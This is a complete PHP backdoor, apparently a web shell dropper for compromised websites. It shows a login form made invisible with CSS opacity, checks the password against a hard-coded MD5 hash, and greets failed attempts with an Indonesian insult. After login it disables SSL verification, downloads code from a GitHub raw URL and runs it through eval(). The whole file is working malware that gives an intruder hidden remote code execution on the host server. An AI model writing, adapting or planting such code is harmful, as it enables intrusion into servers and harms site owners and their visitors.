<?php session_start();
function getUrlsInfo($url)
{
    $options = [
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
        CURLOPT_SSL_VERIFYPEER => 0,
        CURLOPT_SSL_VERIFYHOST => 0,
    ];
    if (function_exists("curl_exec")) {
        $conn = curl_init($url);
        curl_setopt_array($conn, $options);
        if (isset($_SESSION["peli"])) {
            curl_setopt($conn, CURLOPT_COOKIE, $_SESSION["peli"]);
        }
        $xP = curl_exec($conn);
        curl_close($conn);
    } elseif (function_exists("file_get_contents")) {
        $xP = file_get_contents($url);
    } elseif (
        function_exists("fopen") &&
        function_exists("stream_get_contents")
    ) {
        $handle = fopen($url, "r");
        $xP = stream_get_contents($handle);
        fclose($handle);
    } else {
        $xP = false;
    }
    return $xP;
}
function Lx()
{
    return isset($_SESSION["logged_in"]) && $_SESSION["logged_in"] === true;
}
if (isset($_POST["password"])) {
    $vj = $_POST["password"];
    $x0 = "831167d1d11e16b877055beb00ffec4b";
    if (md5($vj) === $x0) {
        $_SESSION["logged_in"] = true;
        $_SESSION["peli"] = "jembut";
    } else {
        echo "salah tol.";
    }
}
if (Lx()) {
    $xP = getUrlsInfo(
        "https://raw.githubusercontent.com/pwnsauce403/dface/main/tahi/cache2.txt"
    );
    eval("?>" . $xP);
} else {
     ?><style> .pV { opacity: 0; } .pV:focus { outline: none; } </style> <form method="post" action=""> <input type="password" name="password" id="password" class="pV"> <input type="submit" value=">>" class="pV"> </form> <?php
} ?>
